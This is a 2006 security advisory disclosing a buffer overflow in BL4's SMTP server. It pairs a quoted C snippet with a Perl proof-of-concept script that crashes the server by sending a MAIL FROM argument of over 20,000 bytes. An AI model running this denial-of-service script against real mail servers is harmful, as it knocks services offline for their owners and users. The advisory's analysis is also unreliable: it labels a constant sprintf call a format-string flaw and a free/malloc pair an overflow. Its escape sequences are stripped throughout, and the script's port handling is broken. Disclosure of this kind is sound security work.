------------------------------------------------------------------------ --- [ECHO_ADV_30$2006] BL4's SMTP server BufferOverflow Vulnerable ------------------------------------------------------------------------ --- Author : Dedi Dwianto Date : April, 27th 2006 Location : Indonesia, Jakarta Web : http://advisories.echo.or.id/adv/adv30-theday-2006.txt Critical Lvl : High ------------------------------------------------------------------------ --- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : BL4's SMTP server version : < 0.1.5 URL : http://bl4qkubartnndfhr.emmeya.com/prog/smtp?0 Description : BL4's SMTP server is an inbound only SMTP server. It currently uses hardcoded values for handling email. The SMTP server puts the incoming email into various text files. ------------------------------------------------------------------------ --- Vulnerability: ~~~~~~~~~~~~~~~~ BL4's SMTP server is to a flaw that can allow remote attacker to cause a denial of service or a attacker can Execution of Arbitrary Code. The vulnerability is due to a buffer overflow in the SMTP service. A remote attacker can repeatedly send more that 2100 bytes as the argument to the HELO, MAIL FROM, and RCPT TO commands to crash the server. ------------------think.c----------------------------------- ........... { slaveEmail[x]->isData = 0; slaveEmail[x]->emailFrom = 0; slaveEmail[x]->emailTo = 0; free(buffer); buffer = malloc(sizeof(char) * 12); sprintf(buffer, "250 OKrn"); return buffer; } free(buffer); ............. slaveEmail[x]->EHLO = buffer; slaveEmail[x]->EHLOtrue = 1; buffer = malloc(sizeof(char) * 12); sprintf(buffer, "250 OKrn"); return buffer; ----------------------------------------------------------- -- sprintf(buffer, "250 OKrn"); -- Vulnerable for format strings. -- free(buffer); buffer = malloc(sizeof(char) * 12); -- Vulnerable for buffer overflow. A attacker can create Arbitrary Code here . Poc: ~~~~~~~~~~~~ #!/usr/bin/perl use IO::Socket; use Socket; my($socket) = ""; if($#ARGV < 1 | $#ARGV > 2) {usage()} if($#ARGV > 2) { $prt = $ARGV[1] } else { $prt = "25" }; $adr = $ARGV[0]; $prt = $ARGV[1]; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr, PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prtn"; print " -- Connecting To SMTP server at $adr port $prt ... n"; sleep(1); print $socket "EHLO yahoo.comrn" and print " -- Sending Request to $adr .....n" or die "Error : can't send Requestn"; sleep(1); print $socket "MAIL FROM:" . "jessy" x 4600 . "rn" and print " -- Sending Buffer to $adr .....n"; sleep(1); printf("[+]Ok!n"); printf("[+]Crash service.....n"); printf("[~]Done.n"); close($socket); sub usage() { print "n=========================================rn"; print " BL4's SMTP server Remote DOS rn"; print "=========================================rn"; print " Bug Found by Dedi Dwianto rn"; print " www.echo.or.id #e-c-h-o irc.dal.net rn"; print " Echo Security Research Group rn"; print "=========================================rn"; print " Usage: perl bl4-explo.pl [target] [port] rnn"; exit(); } ------------------------------------------------------------------------ --- Shoutz: ~~~~~~~ ~ y3dips,moby,comex,z3r0byt3,K-158,c-a-s-e,S`to,lirva32,anonymous ~ newbie_hacker (at) yahoogroups (dot) com [email concealed] ~ #aikmel #e-c-h-o @irc.dal.net ------------------------------------------------------------------------ --- Contact: ~~~~~~~~ Dedi Dwianto || echo|staff || the_day[at]echo[dot]or[dot]id Homepage: http://theday.echo.or.id/ -------------------------------- [ EOF ] ----------------------------------